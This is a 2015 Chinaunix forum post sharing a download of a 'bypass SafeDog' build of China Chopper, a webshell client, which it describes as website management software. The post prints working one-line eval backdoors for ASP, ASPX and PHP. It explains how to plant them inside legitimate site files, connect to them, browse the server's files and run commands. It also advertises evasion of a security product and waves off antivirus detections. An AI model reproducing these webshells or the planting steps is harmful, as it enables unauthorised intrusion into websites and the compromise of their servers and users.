Chinaunix

标题: 2015年最新过狗版菜刀-中国菜刀 [打印本页]

作者: qqamos 时间: 2015-01-13 01:15
标题: 2015年最新过狗版菜刀-中国菜刀
2015年最新过狗版菜刀-中国菜刀

中国菜刀最新过狗版，过安全狗，升级处理，好用，所以就拿出来共享了

好东西，我就不截图了

2015年最新过狗版菜刀-中国菜刀.rar (259.63 KB, 下载次数: 102)

声明：
一切有关安全、后门类软件均会被报毒，不信任可不下载，如不放心可放入虚拟机、沙盒内运行。

中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态
脚本的网站，都可以用中国菜刀来进行管理！

下面简单介绍一下菜刀的功能：

首先说一下菜刀的功能，菜刀是用来连一句话的，asp、aspx、php的一句话菜刀都可以连，只是这几种一句话语句不一样。
asp的一句话是：<%eval request(“pass”)%>
aspx的一句话是：<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是：<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass，也就是双引号或者单引号包含着的这部分，比如我想把asp的一句话的密码改成drvfan，那么改完之后就是这样的：
<%eval request(“pass”)%>
其他同理。
要想连一句话，你首先得把这个一句话插入到一个正常的网站文件中，asp的一句话插入到asp文件里，aspx的一句话插入到aspx文件里，php同理。
当然，你也可以把一句话单独写在一个文件里，比如你新建了一个asp文件，这个asp文件的全部内容就只有一个一句话，也是可以的。
插入了一句话木马，下面就是连接了。
在菜刀主界面，右击，选择“添加”，
在“地址”这里填上你插入一句话的文件的地址，后边的那个小框填的是你的一句话的密码，其他的不用填，
填完之后单击“添加”，就可以了。
添加完毕后，你的这个一句话的shell会显示到主界面里，右击它，选择“文件管理”，就可以看到网站上的文件了
在菜刀里还有一个功能，是“虚拟终端”，也是在右键菜单里的，这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令，那么直接输入命令回车就可以看到结果了

2015年最新过狗版菜刀-中国菜刀.rar

259.63 KB, 下载次数: 4

2015年最新过狗版菜刀-中国菜刀.rar

259.63 KB, 下载次数: 23

作者: caidaonet 时间: 2015-04-11 18:04
提示: 作者被禁止或删除内容自动屏蔽

欢迎光临 Chinaunix (http://bbs.chinaunix.net/)